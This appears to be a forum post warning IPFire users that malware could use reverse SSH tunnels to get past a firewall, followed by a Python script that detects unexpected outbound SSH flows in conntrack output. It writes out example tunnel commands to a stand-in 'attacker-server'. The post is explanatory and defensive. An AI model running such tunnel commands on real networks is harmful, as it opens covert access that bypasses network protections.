I would like to expand on this point.
We’ve often relied on our firewall and routine network scans to ensure the security of our systems, assuming that in the absence of any open ports or established forwarding rules, our network is secure. However, I’d like to highlight a potential threat vector that is harder to detect and could potentially be exploited by sophisticated malware.
A compromised device inside our network could be configured to establish an outgoing Secure Shell (SSH) connection to an external server controlled by an attacker. The SSH protocol has a feature called “tunneling” which can effectively create a hidden access point into our network. This can be done even in the absence of a port forwarding rule on our IPFire firewall, and may not be detected by a port scan if it points the tunnel to a specific server and/or the malware is time-activated.
Here’s a simplified example: A malware program on a device within our network could establish a reverse SSH tunnel to an attacker’s server. This command might look like `ssh -R 8444:localhost:444 -N -f user@attacker-server`. This would create a listening port (8444 in this example) on the attacker’s server. Any connections to this port would be tunneled back to the compromised device on our network (port 444 in this example).
Once the reverse tunnel is established, an attacker can connect to their own server with something like `ssh -L 8444:localhost:8444 user@attacker-server`, which opens a local port on their machine that connects through the tunnel to the compromised device on our network. This provides the attacker with a covert channel into our network that bypasses our normal firewall protections.
This tunnel could be opened at any time by the malware, even after we’ve scanned the network and found no open ports.
As with any tool, this technique can be used for a legitimate purpose, including allowing remote administration of an IPFire machine, using its Web User Interface, behind a Carrier Grade NAT (my example uses port 444, which is the default port of the IPFire WUI).
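One way to look for this kind of tunnel from the firewall side, as an added example that is not part of this post or of IPFire itself: a small script that parses `conntrack -L` style entries and flags established outbound TCP flows from the LAN to SSH ports on hosts that are not on an allowlist of known servers. The conntrack lines, the LAN range and the allowlist below are constructed assumptions; on a real firewall you would feed it the live conntrack output and your own list of approved SSH destinations.

```python
import ipaddress
import re

# Constructed sample of `conntrack -L` style output (made-up addresses, not real traffic).
SAMPLE_CONNTRACK = """\
tcp      6 431998 ESTABLISHED src=192.168.1.50 dst=203.0.113.10 sport=51234 dport=22 src=203.0.113.10 dst=198.51.100.1 sport=22 dport=51234 [ASSURED] mark=0 use=1
tcp      6 299 ESTABLISHED src=192.168.1.20 dst=198.51.100.77 sport=44110 dport=443 src=198.51.100.77 dst=198.51.100.1 sport=443 dport=44110 [ASSURED] mark=0 use=1
tcp      6 431900 ESTABLISHED src=192.168.1.20 dst=192.0.2.5 sport=50001 dport=22 src=192.0.2.5 dst=198.51.100.1 sport=22 dport=50001 [ASSURED] mark=0 use=1
udp      17 29 src=192.168.1.50 dst=192.168.1.1 sport=5353 dport=53 src=192.168.1.1 dst=192.168.1.50 sport=53 dport=5353 mark=0 use=1
tcp      6 431990 ESTABLISHED src=192.168.1.60 dst=203.0.113.10 sport=40000 dport=2222 src=203.0.113.10 dst=198.51.100.1 sport=2222 dport=40000 [ASSURED] mark=0 use=1
"""

# Assumed "green" LAN range of the firewall; adjust to your own network.
LAN = ipaddress.ip_network("192.168.1.0/24")

# Matches the originating direction of a conntrack entry (first src/dst/sport/dport).
# The TCP state word is optional because UDP entries have none.
LINE_RE = re.compile(
    r"^(?P<proto>\w+)\s+\d+\s+(?P<timeout>\d+)\s+(?:(?P<state>[A-Z_]+)\s+)?"
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) sport=(?P<sport>\d+) dport=(?P<dport>\d+)"
)


def parse_conntrack(text):
    """Yield one dict per parseable conntrack line (originating direction only)."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            f = m.groupdict()
            f["timeout"] = int(f["timeout"])
            f["dport"] = int(f["dport"])
            yield f


def find_outbound_ssh(text, allowed_hosts, ssh_ports=frozenset({22}), lan=LAN):
    """Return (src, dst, dport, timeout) for established TCP flows leaving the LAN
    towards an SSH port on a destination that is not in allowed_hosts."""
    hits = []
    for f in parse_conntrack(text):
        if f["proto"] != "tcp" or f["state"] != "ESTABLISHED":
            continue
        src, dst = ipaddress.ip_address(f["src"]), ipaddress.ip_address(f["dst"])
        if src not in lan or dst in lan:
            continue  # only LAN -> outside flows matter for a reverse tunnel
        if f["dport"] in ssh_ports and f["dst"] not in allowed_hosts:
            hits.append((f["src"], f["dst"], f["dport"], f["timeout"]))
    return hits


if __name__ == "__main__":
    for hit in find_outbound_ssh(SAMPLE_CONNTRACK, {"192.0.2.5"}, {22, 2222}):
        print("unexpected outbound SSH: %s -> %s:%d (timeout %d s)" % hit)
```

A long-lived, low-traffic outbound SSH session to a host nobody on the team recognises is the pattern to review; the timeout value only shows how recently the flow saw traffic, so correlate with the client's role and your list of approved SSH destinations before acting on it.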